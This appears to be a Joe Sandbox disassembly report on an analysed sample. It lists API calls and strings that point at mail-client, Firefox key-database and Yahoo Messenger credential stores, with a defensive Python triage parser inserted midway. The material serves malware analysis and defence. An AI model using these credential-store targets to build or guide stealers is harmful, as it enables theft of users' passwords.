                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                • API String ID: 2221118986-3608744896
                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                APIs
                                • memcpy.MSVCRT ref: 00442A5E
                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmpmemcpy
                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                • API String ID: 1784268899-4153596280
                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                • memset.MSVCRT ref: 00410246
                                • memset.MSVCRT ref: 00410258
                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                • memset.MSVCRT ref: 0041033F
                                • _mbscpy.MSVCRT ref: 00410364
                                • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                • String ID:
                                • API String ID: 3974772901-0
                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                APIs
                                • wcslen.MSVCRT ref: 0044406C
                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                • strlen.MSVCRT ref: 004440D1
                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                • memcpy.MSVCRT ref: 004440EB
                                • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                • String ID:
                                • API String ID: 577244452-0
                                • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                APIs
                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                • _strcmpi.MSVCRT ref: 00404518
                                • _strcmpi.MSVCRT ref: 00404536
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi$memcpystrlen
                                • String ID: imap$pop3$smtp
                                • API String ID: 2025310588-821077329
                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                APIs
                                • memset.MSVCRT ref: 0040C02D
                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2726666094-3614832568
                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                APIs
                                • memset.MSVCRT ref: 00403A88
                                • memset.MSVCRT ref: 00403AA1
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                • strlen.MSVCRT ref: 00403AE9
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                • String ID:
                                • API String ID: 1786725549-0
                                • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                APIs
                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                • GetLastError.KERNEL32 ref: 0040C1CA
                                • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                • String ID:
                                • API String ID: 2014771361-0
                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                APIs
                                • memcmp.MSVCRT ref: 00406151
                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                • memcmp.MSVCRT ref: 0040617C
                                • memcmp.MSVCRT ref: 004061A4
                                • memcpy.MSVCRT ref: 004061C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID: global-salt$password-check
                                • API String ID: 231171946-3927197501
                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                APIs
                                • GetClientRect.USER32(?,?), ref: 004016A3
                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                • BeginPaint.USER32(?,?), ref: 004016D7
                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                • EndPaint.USER32(?,?), ref: 004016F3
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                • String ID:
                                • API String ID: 19018683-0
                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                APIs
                                • memset.MSVCRT ref: 0040644F
                                • memcpy.MSVCRT ref: 00406462
                                • memcpy.MSVCRT ref: 00406475
                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                • memcpy.MSVCRT ref: 004064B9
                                • memcpy.MSVCRT ref: 004064CC
                                • memcpy.MSVCRT ref: 004064F9
                                • memcpy.MSVCRT ref: 0040650E
                                  • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                APIs
                                • memset.MSVCRT ref: 0044495F
                                • memset.MSVCRT ref: 00444978
                                • memset.MSVCRT ref: 0044498C
                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                • strlen.MSVCRT ref: 004449A8
                                • memcpy.MSVCRT ref: 004449CD
                                • memcpy.MSVCRT ref: 004449E3
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                • memcpy.MSVCRT ref: 00444A23
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset$strlen
                                • String ID:
                                • API String ID: 2142929671-0
                                • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                APIs
                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                • memset.MSVCRT ref: 0040330B
                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                • strchr.MSVCRT ref: 0040335A
                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                • strlen.MSVCRT ref: 0040339C
                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                • String ID: Personalities
                                • API String ID: 2103853322-4287407858
                                • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                APIs
                                • memset.MSVCRT ref: 00444573
                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValuememset
                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                • API String ID: 1830152886-1703613266
                                • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
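Reading a listing this long by hand is slow, so here is a small triage helper, added as an example and not part of the Joe Sandbox report or of the analysed sample. It parses function records in the plugin's line format as it appears above (an assumption taken from the visible lines: "APIs" opens a record, "• Name.MODULE(args), ref: ADDR" is one call, "• String ID: a$b$c" carries the strings), decodes the access masks passed to OpenProcess and RegOpenKeyExA (0x410 and 0x20019 in the records above), and tags records whose strings name a credential store: the imap/pop3/smtp, global-salt/password-check and Software\Yahoo\Pager entries. The tag names are the editor's reading of those strings, not labels the report assigns; the sample text is an excerpt of the listing with the hash lines dropped.

```python
"""Triage helper for a Joe Sandbox "IDA Plugin" function listing.

Added example (not part of the sandbox report or the analysed sample). It
assumes the line shapes visible in the listing: "APIs" opens a record,
"• Name.MODULE(args), ref: ADDR" is one call (optionally prefixed with
"Part of subcall function ...:"), and "• String ID: a$b" lists strings.
"""
import re

CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[\w?@]+)\.(?P<module>\w+)"          # e.g. OpenProcess.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STRINGS_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")

# Single-bit rights used to decode dwDesiredAccess / samDesired arguments.
PROCESS_RIGHTS = {
    0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x100000: "SYNCHRONIZE",
}
KEY_RIGHTS = {
    0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
    0x20000: "READ_CONTROL",
}
KEY_COMPOSITES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
# api name -> (index of the access-mask argument, single-bit table, composite table)
MASK_ARGS = {"OpenProcess": (0, PROCESS_RIGHTS, {}), "RegOpenKeyExA": (3, KEY_RIGHTS, KEY_COMPOSITES)}

# Strings that name a credential store. The tag is the editor's reading of the
# string, not a label the report itself assigns.
STRING_TAGS = {
    "imap": "mail-client-protocol", "pop3": "mail-client-protocol", "smtp": "mail-client-protocol",
    "global-salt": "nss-key-db", "password-check": "nss-key-db",
    "Software\\Yahoo\\Pager": "yahoo-messenger-registry", "Yahoo! User ID": "yahoo-messenger-registry",
}
API_TAGS = {"OpenProcess": "process-handle", "OpenClipboard": "clipboard",
            "RegQueryValueExA": "registry-read", "GetPrivateProfileSectionA": "ini-read"}
CREDENTIAL_TAGS = {"mail-client-protocol", "nss-key-db", "yahoo-messenger-registry"}


def decode_mask(value, rights, composites=None):
    """Name an access mask: an exact composite if known, else every set bit."""
    if composites and value in composites:
        return [composites[value]]
    names = [name for bit, name in sorted(rights.items()) if value & bit]
    leftover = value & ~sum(rights)
    if leftover:
        names.append(hex(leftover))   # bits the table does not cover
    return names


def parse_listing(text):
    """Split the listing into records: calls, strings, decoded masks and tags."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = {"calls": [], "strings": [], "masks": {}, "tags": set()}
            records.append(rec)
            continue
        if rec is None:
            continue
        call = CALL_RE.match(line)
        if call:
            name, ref = call["name"], call["ref"]
            rec["calls"].append((name, call["module"], ref))
            if name in API_TAGS:
                rec["tags"].add(API_TAGS[name])
            if name in MASK_ARGS:
                idx, rights, composites = MASK_ARGS[name]
                args = [a.strip() for a in (call["args"] or "").split(",")]
                if idx < len(args) and re.fullmatch(r"[0-9A-F]+", args[idx]):
                    rec["masks"][f"{name}@{ref}"] = decode_mask(int(args[idx], 16), rights, composites)
            continue
        strings = STRINGS_RE.match(line)
        if strings:
            ids = [s for s in strings["ids"].split("$") if s]
            rec["strings"].extend(ids)
            rec["tags"].update(STRING_TAGS[s] for s in ids if s in STRING_TAGS)
    return records


def credential_functions(records):
    """Records whose strings name a credential store."""
    return [r for r in records if r["tags"] & CREDENTIAL_TAGS]


# Constructed input: excerpts copied from the listing above, hash lines dropped.
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
• memset.MSVCRT ref: 00410246
• CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
• String ID:
APIs
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
• _strcmpi.MSVCRT ref: 00404518
• String ID: imap$pop3$smtp
APIs
• memcmp.MSVCRT ref: 00406151
• String ID: global-salt$password-check
APIs
• memset.MSVCRT ref: 00444573
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
• String ID: EOptions string$Software\\Yahoo\\Pager$Yahoo! User ID
"""

if __name__ == "__main__":
    for rec in credential_functions(parse_listing(SAMPLE)):
        first = rec["calls"][0][2] if rec["calls"] else "-"
        print(first, sorted(rec["tags"]), rec["masks"], rec["strings"])
```

Run against the full report text the same way; the mask decoder reports any bits it does not know as a hex remainder rather than silently dropping them, and records that carry only SQLite error strings stay untagged because those strings are not in the credential table.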
                                APIs
                                Strings
                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                • API String ID: 3510742995-272990098
                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: H
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID: @ $SQLite format 3
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: winWrite1$winWrite2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: winRead
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: gj
                                APIs
                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                • memset.MSVCRT ref: 0040AB9C
                                  • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                • sprintf.MSVCRT ref: 0040ABE1
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                • String ID: <%s>%s</%s>$</item>$<item>
                                APIs
                                • GetParent.USER32(?), ref: 004090C2
                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
